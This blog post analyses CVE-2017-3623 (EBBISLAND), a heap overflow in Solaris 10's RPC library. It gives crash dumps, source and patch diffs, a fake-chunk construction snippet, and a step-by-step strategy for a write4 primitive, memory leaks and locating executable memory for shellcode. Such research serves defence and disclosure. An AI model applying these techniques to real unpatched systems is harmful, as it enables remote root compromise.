Tuesday, November 13, 2018

Recent kernel memory disclosure bugs in CANVAS

In July 2017, a blog post from Anders Fogh introduced the idea of leaking kernel memory from unprivileged userland. This was later followed by the public disclosure of both Spectre and Meltdown and their corresponding coverage in the media. For Immunity this was the perfect opportunity to not only write two Spectre exploits for CANVAS (the Windows version being CEU only) but also a framework dedicated to this vulnerability class. In particular we also wrote CANVAS exploits for CVE-2017-18344 and CVE-2018-14656. Some of our exploitation notes have been published on the Immunity website:

Part 1: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_1.pdf
Part 2: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_2.pdf

Monday, July 10, 2017

A few notes about the exploitation of CVE-2017-3623 (aka EBBISLAND) on Solaris 10 (x86/amd64)

The advisory CVE-2017-3623 [CVE] is associated with the infamous EBBISLAND exploit that was leaked as part of the Equation Group collection [EQGROUP]. The corresponding heap overflow vulnerability can be exploited to provide a remote root shell to the attacker. What makes it especially interesting is that:
  • The vulnerability was confirmed in Solaris 6 to 9 (by @hackerfantastic [HFANT]). We confirm that Solaris 10 (up to u10) is vulnerable as well.
  • It is not a bug within a specific service but rather within a library (libnsl.so) that is linked to most of the RPC services (more on that later). The implication is that there is not a single entry point but many.
Long story short, an unpatched Solaris exposing at least one of its RPC services can be compromised. It is just a matter of having a supported target. This is one of the most interesting bugs affecting Solaris that we know of. The u11 version of Solaris 10, which was released in 2013, fixed the bug, which means that Oracle’s engineers were aware of it yet chose not to disclose it (or were told not to). Instead they advertised perhaps more relevant security features :).


Illustration 1: http://docs.oracle.com/cd/E26505_01/html/E27003/index.html

We could not find any mention of the patch within the release notes. Was the bug found by the Equation Group during a diff session? Who knows.

In this paper, we discuss the exploitation of the vulnerability on Solaris 10 (Intel only). The exploitation on previous versions is assumed to be easy and will not be discussed. We quickly reversed the EQGRP binary EBBISLAND [EBB] to trigger the vulnerability. Reading [F1] and [F2] seemed to confirm at the time that EBBISLAND mostly relied on per-target settings, but we could be proven wrong as we did not reverse the ebbshave.vX binaries. For this reason, and because we focused our efforts on Solaris 10, which is more difficult to exploit than version 9 and earlier, we developed our own exploitation strategy which is presented here. It is of course possible that smarter strategies exist.

1. The vulnerability analysis

This vulnerability is (officially) said to affect the kernel RPC subsystem as illustrated by both [CVE] and [ORACLE]. Is that really the case though?

Discrediting the kernel hypothesis

The Solaris RPC subsystem runs both within the kernel (rpcmod, rpcsec modules) and in userland (/lib/libnsl.so.1). Both implementations use very similar code, therefore a memory corruption bug could potentially affect both components. To find out which one is affected, it is enough to use the original leaked binary and observe its effect on a vulnerable target.
No matter the options chosen on the CLI, the EBBISLAND [EBB] exploit generates a single frame with a very specific structure. In particular the credentials structure has its "flavor" (this is the name of this field) set to 0x55de (AUTH_LOOPBACK). This identifies the authentication subsystem and XDR encoded data follows as its parameters. It is clear from the observation of the packet that the bug is related to the authentication subsystem.
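To make the role of the "flavor" field more concrete, here is a minimal sketch that decodes the header of an ONC RPC credential (an XDR opaque_auth: a 32-bit flavor, a 32-bit length, then the body). The helper name parse_opaque_auth and the sample bytes are hypothetical; only the AUTH_LOOPBACK value is taken from the text above.

```python
import struct

AUTH_LOOPBACK = 0x55de  # flavor value quoted in the text above


def parse_opaque_auth(buf, offset=0):
    """Decode an XDR opaque_auth: flavor (u32), length (u32), body."""
    flavor, length = struct.unpack_from(">LL", buf, offset)
    start = offset + 8
    body = buf[start:start + length]
    if len(body) != length:
        raise ValueError("truncated credential body")
    return flavor, body


# Hypothetical sample: an AUTH_LOOPBACK credential with an 8-byte body.
sample = struct.pack(">LL", AUTH_LOOPBACK, 8) + b"\x00" * 8
flavor, body = parse_opaque_auth(sample)
print(hex(flavor), len(body))
```

XDR integers are big-endian on the wire, which is why the sketch uses the ">" format prefix.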

The coredump analysis

Replaying a modified packet targeting bootparams allows us to trigger a userland crash (in this case in rpc.metamhd rather than bootparams):


bash-3.00# /opt/csw/bin/gdb /usr/sbin/rpc.metamhd core
GNU gdb (GDB) 7.7
[...]
Reading symbols from /usr/sbin/rpc.metamhd...(no debugging symbols found)...done .
[New LWP 1]
[New LWP 2]
[Thread debugging using libthread_db enabled]
[New Thread 1 (LWP 1)]
[New Thread 2 (LWP 2)]
Core was generated by `/usr/sbin/rpc.metamhd'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1
(gdb) bt
#0 0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1
#1 0xd0f0c09e in svc_vc_reply () from /lib/libnsl.so.1
#2 0xd0f03c47 in svcerr_noprog () from /lib/libnsl.so.1
#3 0xd0f040fa in _svc_prog_dispatch () from /lib/libnsl.so.1
#4 0xd0f08bfc in _svc_run_mt () from /lib/libnsl.so.1
#5 0xd0f08473 in svc_run () from /lib/libnsl.so.1
#6 0x08057094 in main ()
(gdb) print /x $ecx
$1 = 0x450685ec <-- 0x450685ec was read from the network buffer
(gdb) x/6i $pc
=> 0xd0efe2cc <xdr_replymsg+75>: mov 0x18(%ecx),%ecx <-- control of %ecx is possible
0xd0efe2cf <xdr_replymsg+78>: add $0x18,%eax
0xd0efe2d2 <xdr_replymsg+81>: push %eax
0xd0efe2d3 <xdr_replymsg+82>: push %edi
0xd0efe2d4 <xdr_replymsg+83>: call *%ecx <-- If %ecx can be controlled, %EIP can be set.
0xd0efe2d6 <xdr_replymsg+85>: add $0x8,%esp
(gdb)

The payload reliably triggers the crash. Thanks to the core dump analysis it is possible to see that:
  • The crash occurs within “libnsl.so.1”.
  • The memory corruption is heap based.
  • This specific crash is reliable and almost always the same (a dereference of %ecx), which gives us instant EIP control.

Note:
  • The exact same crash is obtained when targeting several (but not all) other processes. This seems to confirm that contrary to the official statement, the “ebbisland” bug is a userland one affecting libnsl.so.1. It is possible that there is (or was) a “similar” kernel bug but it is not what is currently exploited by the leaked binary.
  • On approximately 1/20 attempts, the crash occurs in a different place. We can assume that this is due to small (unexpected) heap variations.
  • On Solaris 9 and below there is no NX bit (and no ASLR) therefore achieving code execution from this point is trivial.

The source code analysis

The vulnerability itself is a heap overflow in __svcauth_loopback(). When an RPC call is performed, a tag (the so-called "flavor" in the credentials struct) is used to select an authentication subsystem. If the value 0x55de (AUTH_LOOPBACK) is used then the “loopback” authentication is selected.

RPC services are constantly polling for new RPC messages. When one is received, the svc_getreq_common() function is called over a specific file descriptor. This function then retrieves the corresponding SVCXPRT object associated with that descriptor and two of its attributes: "msg" and "r", calling _svc_prog_dispatch() in the process.

_svc_prog_dispatch() may perform an authentication and calls __gss_authenticate() with "r" and "msg" to do so.

Depending on the flavor, which is extracted from the network buffer, the function calls the corresponding authentication subsystem. When the authentication flavor is AUTH_LOOPBACK (0x55de), the function calls __svcauth_loopback().

__svcauth_loopback() essentially starts by extracting data out of the network buffer by using the XDR decoding API. An array of GIDs may be provided by the attacker within the frame. To avoid buffer overflows, the number of GIDs that a user may provide is limited to NGRPS_LOOPBACK (=64) as demonstrated by the following code:


[...]
area = (struct area *)rqst->rq_clntcred;
aup = &area->area_aup;
[...]
gid_len = IXDR_GET_U_INT32(buf); // reads the gid_len (unsigned) from the network
if (gid_len > NGRPS_LOOPBACK) { // security check
stat = AUTH_BADCRED;
goto done;
}
aup->aup_len = gid_len;
for (i = 0; i < gid_len; i++) {
aup->aup_gids[i] = (gid_t)IXDR_GET_INT32(buf);
}



At first glance, there does not seem to be any corruption of any kind. However, the check is misleading as one may think that the final buffer is able to store up to 64 GIDs when it is ... not!

While the loop itself is correct, it relies on the assumption that aup is pointing to a buffer big enough to store the entire 'struct area', including one with up to 64 GIDs.

This is however not the case, but it is not obvious at first sight as the allocation is performed several functions earlier:

a) Each SVCXPRT object is created within svc_xprt_alloc()


SVCXPRT *
svc_xprt_alloc(void)
{
[..]
if ((cred_area = malloc(2*MAX_AUTH_BYTES + RQCRED_SIZE)) == NULL)
goto err_exit;
xt->cred_area = cred_area;
[...]
return (xprt);
err_exit:
svc_xprt_free(xprt);
return (NULL);
}

cred_area is a big buffer of size S = 2*MAX_AUTH_BYTES + RQCRED_SIZE bytes
S = 2*400 + 400 = 1200 bytes

b) When data arrives on the socket (for a specific file descriptor), svc_getreq_common() is called

void
svc_getreq_common(const int fd)
{
SVCXPRT *xprt;
enum xprt_stat stat;
struct rpc_msg *msg;
struct svc_req *r;
char *cred_area;

[...]
if ((fd >= nsvc_xports) || (xprt = svc_xports[fd]) == NULL) { // [L1]
(void) rw_unlock(&svc_fd_lock);
return;
}
[...]
r = SVCEXT(xprt)->req; // [L2]
[...]
cred_area = SVCEXT(xprt)->cred_area;
msg->rm_call.cb_cred.oa_base = cred_area;
msg->rm_call.cb_verf.oa_base = &(cred_area[MAX_AUTH_BYTES]);
r->rq_clntcred = &(cred_area[2 * MAX_AUTH_BYTES]); // [L3]

L1: The SVCXPRT object (xprt) is retrieved based on a global array of sockets (svc_xports)
L2: The svc_req object is derived from xprt
L3: r->rq_clntcred is set to &(cred_area[2 * MAX_AUTH_BYTES]) which means that it points to the remaining 400 bytes.



In __svcauth_loopback(), a 'struct area *' pointer is used over rq_clntcred, therefore over the aforementioned 400-byte buffer. The function copies directly from the network to this buffer. The size of the whole structure (which includes the 64 GIDs) is:

S = sizeof(authsys_parms) + (MAX_MACHINE_NAME+1) * sizeof(char) + NGRPS_LOOPBACK * sizeof(gid_t)
  = (6 * 4) + (255+1)*1 + 64*4 = 536 bytes



This is significantly greater than the 400 bytes available, hence the (heap) overflow.
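The arithmetic above can be checked with a few lines of Python. This is only a sketch using the constants quoted in the text; the derived "largest safe GID count" additionally assumes that the GID array is the last member of struct area and that there is no padding between members.

```python
# Constants quoted in the text.
MAX_AUTH_BYTES = 400
RQCRED_SIZE = 400
MAX_MACHINE_NAME = 255
NGRPS_LOOPBACK = 64
SIZEOF_AUTHSYS_PARMS = 6 * 4
SIZEOF_GID = 4

# Whole allocation, and the part left for rq_clntcred.
cred_area_size = 2 * MAX_AUTH_BYTES + RQCRED_SIZE
available = cred_area_size - 2 * MAX_AUTH_BYTES

# Size of 'struct area' with the maximum number of GIDs.
header_size = SIZEOF_AUTHSYS_PARMS + (MAX_MACHINE_NAME + 1)
struct_area_size = header_size + NGRPS_LOOPBACK * SIZEOF_GID
overflow = struct_area_size - available

# Assumption: the GIDs start right after the header, with no padding.
max_safe_gids = (available - header_size) // SIZEOF_GID

print(cred_area_size, available, struct_area_size, overflow, max_safe_gids)
```

Under these assumptions, any gid_len between 31 and 64 passes the NGRPS_LOOPBACK check while writing past the end of the allocation.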

How the vulnerability was fixed


Oracle chose to fix this vulnerability by extending the size of cred_area.

This is the disassembly of svc_xprt_alloc() on S10u8 (unpatched version):


.text:00044166 push 24h ; '$' ; size
.text:00044168 call _malloc
.text:0004416D add esp, 4
.text:00044170 test eax, eax
.text:00044172 jz short loc_441A7
.text:00044174 mov [edi+0Ch], eax
.text:00044177 push 4B0h ; size <-- 1200 bytes
.text:0004417C call _malloc
.text:00044181 add esp, 4
.text:00044184 test eax, eax

And we can compare it with the disassembly of svc_xprt_alloc() on S10u11 (patched version):


.text:0004464E push 24h ; '$' ; size
.text:00044650 call _malloc
.text:00044655 add esp, 4
.text:00044658 test eax, eax
.text:0004465A jz short loc_4468F
.text:0004465C mov [edi+0Ch], eax
.text:0004465F push 538h ; size <-- 1336 bytes
.text:00044664 call _malloc
.text:00044669 add esp, 4
.text:0004466C test eax, eax

The allocation grew from 1200 to 1336 bytes, so the buffer used to copy the struct area is now 1336 - 2*400 = 536 bytes, which is exactly what was necessary according to our calculation.
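As a quick sanity check of the two malloc() sizes seen in the disassembly, the sketch below subtracts the two MAX_AUTH_BYTES regions that precede rq_clntcred. The helper name clntcred_room is hypothetical.

```python
MAX_AUTH_BYTES = 400  # value used in the text


def clntcred_room(malloc_size):
    """Bytes left for rq_clntcred once the two auth areas are removed."""
    return malloc_size - 2 * MAX_AUTH_BYTES


unpatched = 0x4B0  # push 4B0h on S10u8
patched = 0x538    # push 538h on S10u11

print(unpatched, clntcred_room(unpatched))
print(patched, clntcred_room(patched))
```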

2. A few thoughts about the exploitability on Solaris 10




Exploiting a bug on Solaris 10 is much easier than it is on Linux for several very specific reasons:

  • There is no “real” ASLR. Solaris 10 does support the NX bit preventing the execution of code in the data regions (stack, heap, data section, etc) but without any strong ASLR the mechanism is only partially effective as ret2libc payloads can be written for identified targets. 
  • Kind of like service packs in Windows, Solaris has the concept of periodic updates (numbered from u1 to u11) [SOL]. Some changes can be observed between binaries of different updates, yet it is not an absolute rule that a given binary will be recompiled. In particular, some of them (especially among the RPC services) have either not changed at all or not too often from u1 to u10. Two examples of such binaries would be “/usr/sbin/rpc.bootparamd” and “/usr/lib/netsvc/rusers/rpc.rusersd”. This is interesting because for these services a generic ret2libc payload can be written, modulo of course heap and library addresses. For other services, assuming an exploit writer who has enough resources (both in time and .iso files), it is still very possible to build a short list of ret2libc (ROP) payloads for each specific service.
  • The dynamic linker (/lib/ld.so.1) uses “rwx” pages (for unknown reasons). If one can copy shellcode into these pages it is instant game over. This also means that the ret2libc primitive can be extremely small, thus extremely easy to generate.



(Almost) no ASLR and a small set of binaries make the exploitation not only possible but relatively simple from a theoretical point of view. Practically speaking though, there are several factors that need to be taken into account:

  • Depending on the service that you attack, the update and how the service is managed (svcadm, inetadm, cli, etc.), you may not have an unlimited number of attempts to exploit it. In the worst case you may render a service unusable and trigger logs that are very easy to find (not to mention the corresponding core file):


bash-3.2# cat /var/adm/messages|grep maintenance
Jun 13 11:42:34 Host-001 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
Jun 14 08:10:28 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
Jun 14 08:14:08 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
Jun 14 08:34:33 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
bash-3.2# svcs -xv
svc:/application/print/server:default (LP print server)
State: disabled since Wed Jun 14 08:15:58 2017
Reason: Disabled by an administrator.
See: http://sun.com/msg/SMF-8000-05
See: man -M /usr/share/man -s 1M lpsched
Impact: 2 dependent services are not running:
svc:/application/print/rfc1179:default
svc:/application/print/ipp-listener:default

svc:/network/rpc/bootparams:default (boot parameter server)
State: maintenance since Wed Jun 14 08:34:33 2017
Reason: Restarting too quickly.
See: http://sun.com/msg/SMF-8000-L5
See: man -M /usr/share/man -s 1M rpc.bootparamd
See: /var/svc/log/network-rpc-bootparams:default.log
Impact: This service is not running.
bash-3.2#



  • While there is no specific “security” ASLR per se, there is still a “natural” ASLR. The heap may (or should) be different from one update to another. This is essentially because while the main binary of the service does not change (much), the libraries it is linked against actually do. Additionally, two identical OS installations may load libraries at different addresses. Empirical results suggest that there is a natural entropy of at most 8 bits (probably a lot less in practice). This entropy seems to be a per-boot factor, which means that for a given boot, two processes (executed from the same binary) will have the same layout. This can easily be seen by comparing the core files produced during crashes:

bash-3.00# pmap core*|grep ld|grep 160K
D13C4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D13C4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D13C4000 160K r-x-- /lib/ld.so.1

  • Finally, depending on “when” you attack the service, the heap might not be in a usable state. Specifically, one-shotting a service that has been used before is probably very difficult. Fortunately, if you can reliably crash it you will be fine, as your exploit should be the first to interact with the service once its memory has been reset. Of course if you choose to target some highly used RPC service, such as one related to file sharing, this may not hold.
  • The main binary, though possibly quite constant across updates, will be small in size. This means that the ret2libc payload created using code borrowed from the binary (the so-called gadgets) could be quite limited in functionality. This ELF binary will always be loaded at 0x08050000.
  • The architecture of the target is unknown. Interestingly enough, whether you run a 32-bit or a 64-bit environment, your service is still 32-bit. That being said, the address space will change depending on the kernel architecture. This is documented in the excellent [CORE].
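The comparison of ld.so.1 base addresses across core files (the pmap listing above) is easy to automate. The following sketch parses the same output and reports the distinct bases; the function name base_addresses is hypothetical and the input is simply the listing quoted in this post.

```python
PMAP_OUTPUT = """\
D13C4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D13C4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D13C4000 160K r-x-- /lib/ld.so.1
"""


def base_addresses(text, path="/lib/ld.so.1"):
    """Return the mapping base of every line that refers to 'path'."""
    bases = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 4 and fields[3] == path:
            bases.append(int(fields[0], 16))
    return bases


bases = base_addresses(PMAP_OUTPUT)
distinct = sorted(set(bases))
delta = distinct[-1] - distinct[0]
print([hex(b) for b in distinct], hex(delta))
```

With only seven core files this says little about the real entropy; it merely shows that the sample contains two distinct bases.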


To sum things up, for a given service (bootparams, metad, metamedd, etc.) writing a payload is easy modulo the knowledge of a few parameters (the binary version, the architecture, the update version, the effect of the current boot on the ASLR, etc.). Guessing is certainly possible but the cost is necessarily one crash per attempt (mandatory heap reset), which means at least a dozen crashes.

There are of course many ways to reduce this number quite effectively, but since we face services that may stop functioning at some point, this is not acceptable. For these reasons we explored the idea of leaking information out of the process to create more reliable primitives. We will now detail the strategy deployed for the exploit module released within Canvas 7.14 targeting bootparams.

Note: Exploiting other services requires slightly different strategies. We applied some of them to increase the number of targets (especially when bootparams is not available) in the updated version of the module (Canvas 7.15). We won’t discuss this in this blog post.


3. Information Leaking


The overflow primitive allows us to overwrite adjacent objects which, depending on the heap layout, may include pointers, file descriptors, etc. It is probably possible to generate an information leak this way, but that means dealing with several difficulties:

  • the overflow primitive only allows the overwriting of the next 4*n bytes where n is fixed. Since pointer addresses are aligned modulo 4, partial pointer overwrites are not directly doable, which means some guessing, the corruption of another object type, etc. 
  • being able to overwrite a specific object requires a heap control ranging from painful to undoable (depending on the allocator, your degree of control, etc.). 

On a modern OS, the allocator is usually heavily protected against trivial manipulation of chunk metadata, which is why exploit writers often favor adjacent object overflows with this kind of primitive. Fortunately this is not the case with Solaris 10 (but may be with Solaris 11?), thus it is doable to transform our adjacent overwrite into a write4 primitive which is, especially when you have a poor ASLR, a much better weapon and saves us a lot of effort.

(a) A few notes about how to achieve the write4


Achieving the write4 is obviously completely dependent on the underlying allocator which, on Solaris 10, is based on self-adjusting binary trees. One can find the main ideas behind it in [SABT]. We assume that the reader is already very familiar with the excellent [P57OUAF]. Our write4 primitive is a direct application of the technique described in this paper.


However, for the sake of completeness, let us provide a few additional details:
  • As explained in [P57OUAF], the chunks have fields of type WORD and a WORD is itself a union. The size of this object is controlled by the ALIGN macro which is 8. This is important because most of the fields are 32-bit pointers: in memory there is a 4-byte gap (filled with 0) between two fields instead of immediately consecutive pointers. The reason behind such a choice is unclear but it needs to be taken into account during the exploitation attempt as pointed out in [P57OUAF]. We recommend reading the assembly code instead of the source code.
  • A call to free() does not trigger an actual chunk manipulation. Instead that chunk C is only placed in a circular list, flist. Later when (or if) enough allocations and deallocations are made, realfree() will be called upon C. If the header of C was corrupted, an unlink-like primitive will be user controlled and a write4 primitive achieved. It is mandatory to understand this point as the write4 is absolutely not synchronous by default! This can however be fixed:
      • The user can initiate a lot of dummy connections on the attacked service and disconnect all of them while keeping one connection alive (for the leak). The idea behind is that free() will be called upon all the corresponding structures. Since the circular list is not so big, this eventually triggers a call to realfree() upon the corrupted chunk.
      • Keeping one connection alive is mandatory to have something interesting to corrupt on the heap. In this case ‘interesting’ means that the structure must be alive (still used by the process).
        Note: The dummy connections have an obvious influence on the heap so every leak primitive will have to take this into account.
  • The unlink() primitive exploited within realfree() will perform two write operations. By design overwriting at address X with DWORD Y is only possible if Y (modulo an offset) is a valid pointer to writable memory. Nothing new here. To avoid problems we use the (universal) address 0x08063000 (.got) when we can, heap & stack addresses otherwise.
  • We do overwrite the size field of the adjacent chunk as proposed in [P57OUAF]. However, to avoid too much heap corruption, we chose to create a fake chunk before the corrupted one. Since the (overwritten) size field is used as an offset (without any sanity check), we can set it to a negative value (0xffffffc0 | 1). Below is the fake chunk located a little bit before the overflown chunk:
pattern += struct.pack('>L', 0x200) # t_s +0
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', self.where) # t_p +8
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', 0xffffffff) # t_l +16
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', 0) # t_r +24
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', self.what) # t_n +32 # Must be writable!
pattern += struct.pack('>L', 0)
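To illustrate the 8-byte WORD slots and the negative size value mentioned above, here is a small decoding sketch. It reads a blob laid out like the pattern (one 32-bit value followed by 4 bytes of padding per field) and shows how 0xffffffc0 reads as a signed 32-bit integer. The where/what values are placeholders, and the helper names are hypothetical.

```python
import struct

WORD_SIZE = 8  # ALIGN value quoted in the text
FIELDS = ("t_s", "t_p", "t_l", "t_r", "t_n")


def decode_fields(blob):
    """Read one 32-bit value per 8-byte slot, ignoring the padding."""
    out = {}
    for i, name in enumerate(FIELDS):
        value, _pad = struct.unpack_from(">LL", blob, i * WORD_SIZE)
        out[name] = value
    return out


def as_signed32(value):
    """Interpret an unsigned 32-bit value as a signed one."""
    return value - (1 << 32) if value & 0x80000000 else value


# Placeholder values standing in for self.where and self.what.
where, what = 0x11111111, 0x22222222
sample = b"".join(struct.pack(">LL", v, 0)
                  for v in (0x200, where, 0xffffffff, 0, what))

fields = decode_fields(sample)
raw_size = 0xffffffc0 | 1
size = as_signed32(raw_size & ~1)  # drop the low bit set in the text
print({k: hex(v) for k, v in fields.items()}, size)
```

The size value decodes to -64, which is what lets the allocator step backwards to a fake chunk instead of forwards.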


(b) Transforming the write4 into an information leak


If the attacker sends a non-crashing payload to the bootparams service, an answer of 36 bytes is sent in return. Analyzing libnsl, one can easily see that the function xdr_replymsg() is called when the authentication fails and sends the aforementioned packet. Interestingly enough, building the RPC answer and sending it is fairly complex: structures acting as pseudo classes and their methods are involved. In particular, one can make the following observations:

  • For each connection to the service, two RECSTREAM objects are built, one dealing with the reception of the query and the other one dealing with the emission of the answer. 
  • The definition of this object can be found in the source code of OpenSolaris [OPENSOL] and, practically speaking, seems to match the assembly code of the actual binaries. It is the following:
typedef struct rec_strm {
caddr_t tcp_handle;
[...]
int (*writeit)();
caddr_t out_base; /* output buffer (points to frag header) */
caddr_t out_finger; /* next output position */
caddr_t out_boundry; /* data cannot up to this address */
uint32_t *frag_header; /* beginning of current fragment */
bool_t frag_sent; /* true if buffer sent in middle of record */
[...]
int (*readit)();
caddr_t in_base; /* input buffer */
caddr_t in_finger; /* location of next byte to be had */
caddr_t in_boundry; /* can read up to this location */
int fbtbc; /* fragment bytes to be consumed */
bool_t last_frag;
uint_t sendsize;
uint_t recvsize;
[...]
uint_t firsttime;
[...]
uint_t in_nonblock; /* non-blocked input */
uint_t in_needpoll; /* need to poll to get more data ? */
uint32_t in_maxrecsz; /* maximum record size */
caddr_t in_nextrec; /* start of next record */
uint32_t in_nextrecsz; /* part of next record in buffer */
} RECSTREAM;

This object keeps track of several pointers including one locating the buffer to be sent (out_base) when the writeit() method is called.
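The frag_header field refers to the standard ONC RPC record marking used over TCP: each fragment is preceded by a 32-bit big-endian word whose top bit flags the last fragment and whose remaining 31 bits give the fragment length. A minimal decoding sketch follows; the function name and the sample length are hypothetical.

```python
import struct

LAST_FRAG = 0x80000000  # top bit of the record mark


def parse_record_mark(header):
    """Split a 4-byte record mark into (is_last_fragment, length)."""
    (word,) = struct.unpack(">L", header)
    return bool(word & LAST_FRAG), word & 0x7FFFFFFF


# Hypothetical sample: a final fragment carrying 32 bytes of data.
mark = struct.pack(">L", LAST_FRAG | 32)
is_last, length = parse_record_mark(mark)
print(is_last, length)
```

A client reading a reply can use this length to tell a normal answer from an unexpectedly short or long one.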

Based on this information, it seems very easy to leak any kind of memory. One creates a dummy connection and hangs. Doing so, the two RECSTREAM objects associated with this connection will be created and populated. The exploit connection triggers the write4 and overwrites the out_base of the dummy’s RECSTREAM (emission) with the address of the area to be leaked. The dummy client then sends its payload. This triggers an answer. Instead of receiving the expected answer, the client receives the memory content starting at the overwritten out_base. By repeating the operation a number of times, the client can get as much information as required modulo his knowledge of the target’s address space. This primitive has a number of limitations:

  • The location of the RECSTREAM (heap) object must be known. ASLR does not affect the heap layout, but the stack (therefore the environment, the process’s arguments, etc.) as well as the update level do. As such one can roughly estimate the location of this structure but can rarely locate it immediately. One can however make a few observations to improve the search: 
    • Overwriting out_base or out_finger, which are adjacent, triggers a leak. As such, it is possible to bruteforce the address modulo 8, which speeds up the search considerably. It should be noted that overwriting out_finger triggers a “smaller” leak (the packet is shorter than 36 bytes), which makes it possible to distinguish one case from the other when the leak is detected. This gives us the exact address of the RECSTREAM object. 
    • One can observe that for a given service, there is an empirical difference of around 0x200 bytes on average between two RECSTREAM addresses for two consecutive update levels. The immediate consequence is that for a given service, the RECSTREAM structure can be searched within a rather small range. Our exploit includes 3 strategies based on this observation to locate the structure (one fast, one reasonably fast and a slow one). 
  • While the leak primitive seems perfect at first, it is much more limited than anticipated. In particular not all the regions can be leaked because of the internal checks related to out_base (cf. xdrrec_endofrecord()).



For this reason, we decided to create a second much less limited leak primitive. To achieve such a result, we observe that:

  • A unique RECSTREAM reference is stored within an XDR object whose location is empirically very close to that of the RECSTREAM object. Changing the pointer within the XDR can be done using the write4 primitive we talked about. 
  • The first leak primitive allows us to leak the content of the original RECSTREAM object itself. This is important as the exploit can then create a perfect copy of this structure. 
  • A fake RECSTREAM object could be stored within one of our network packets and its location found using the first leak. 


In a nutshell, based on these three observations we devise the following strategy: we locate the XDR structure corresponding to the RECSTREAM and replace the corresponding pointer with one pointing to a fake structure at a user-controlled location. This fake RECSTREAM object can be crafted as precisely as required. With this alternate primitive one can easily extend the range of what is leakable and in particular locate and leak the stack among other things.

Note: The CODE segment of binaries cannot be leaked using this primitive, as it requires a write into the memory being read, which is obviously impossible on these memory regions (see the flush_out() function and especially the frag_header parameter).

4. A few words about leaking the stack


Leaking the stack is very important in order to stabilize the exploit:


  • Most of the stack frames can be recovered, which is especially important given that the location of saved frame pointers can be deduced (more on that later). 
  • Several heap object locations are leaked. This (eventually) allows more creativity in the exploitation process. We do not use this though. 
  • The entire environment is retrieved, in particular the AUXV array which leaks interesting parameters as shown below (“usr/src/uts/common/sys/auxv.h”):
#define AT_SUN_UID 2000 /* effective user id */
#define AT_SUN_RUID 2001 /* real user id */
#define AT_SUN_GID 2002 /* effective group id */
#define AT_SUN_RGID 2003 /* real group id */
[...]
#define AT_SUN_LDELF 2004 /* dynamic linker's ELF header */
#define AT_SUN_LDSHDR 2005 /* dynamic linker's section headers */
#define AT_SUN_LDNAME 2006 /* name of dynamic linker */
#define AT_SUN_LPAGESZ 2007 /* large pagesize */
[...]
#define AT_SUN_MMU 2015 /* mmu module name */
#define AT_SUN_LDDATA 2016 /* dynamic linkers data segment */

Long story short, one can leak the address of a memory region that is always writable and executable thus an excellent candidate to hold a shellcode.
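Once a stack dump is available, finding an entry such as AT_SUN_LDDATA is a matter of walking the auxiliary vector. The sketch below assumes 32-bit little-endian (type, value) pairs terminated by AT_NULL (0), as expected for a 32-bit x86 process; the function name and the sample values are hypothetical.

```python
import struct

AT_NULL = 0           # standard auxv terminator
AT_SUN_LDDATA = 2016  # value from auxv.h quoted above


def parse_auxv(blob):
    """Return {type: value} for each auxv pair up to AT_NULL."""
    usable = len(blob) - (len(blob) % 8)  # ignore a trailing partial pair
    entries = {}
    for a_type, a_val in struct.iter_unpack("<LL", blob[:usable]):
        if a_type == AT_NULL:
            break
        entries[a_type] = a_val
    return entries


# Hypothetical dump: two entries, the terminator, then unrelated data.
dump = struct.pack("<LLLLLLLL",
                   2000, 0,
                   AT_SUN_LDDATA, 0x12345000,
                   AT_NULL, 0,
                   0xdeadbeef, 0xdeadbeef)
auxv = parse_auxv(dump)
print(hex(auxv[AT_SUN_LDDATA]))
```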

Bonus: Leaking the stack also makes it possible to retrieve important addresses from the main binary. There are theoretical implications but since the bootparams binary has not changed from u2 (and possibly u1) to u10, there is no practical interest.

5. Putting everything together


Before detailing the algorithm of the exploit we must explain something else. We observed that on u10 (and u10 only) crashing the bootparams service more than 4 times in a row would ultimately lead to the service being put into “maintenance mode”. This change of state is logged in the process. The troublesome consequence is that the bootparams service is no longer accessible for further exploitation attempts. It is instant game over (at least with bootparams).

It is unknown if waiting long enough would solve this situation, but it would also make our exploitation too slow for practical needs. Instead, and because only u10 is an annoying case, we use the following strategy: no matter what happens, we use static parameters against u10 to one-shot it. We attempt the u10 exploitation before even trying to set up our leak primitive in order to reduce the number of crashes. 

If the target is indeed u10, chances are good that we get a shell this way. If it is not, this won’t have any negative consequences anyway because the process will respawn (almost) indefinitely. The leak_and_pwn method should thus grant us a shell.

The leak_and_pwn method of the exploit works for u2 up to u9 (x86/amd64) and follows this algorithm: 

  1. The exploit attempts to leak the address of a RECSTREAM structure associated with a leaking process. It uses several strategies to do so including known addresses and empirical ranges.
  2. The corresponding RECSTREAM content is leaked and a fake structure is prepared.
  3. The XDR object holding the reference to the aforementioned RECSTREAM object is leaked. 
  4. The exploit attempts to locate its network packets stored on the heap. 
  5. The exploit now uses a second leak primitive based on a fake RECSTREAM to leak the content of the stack. 
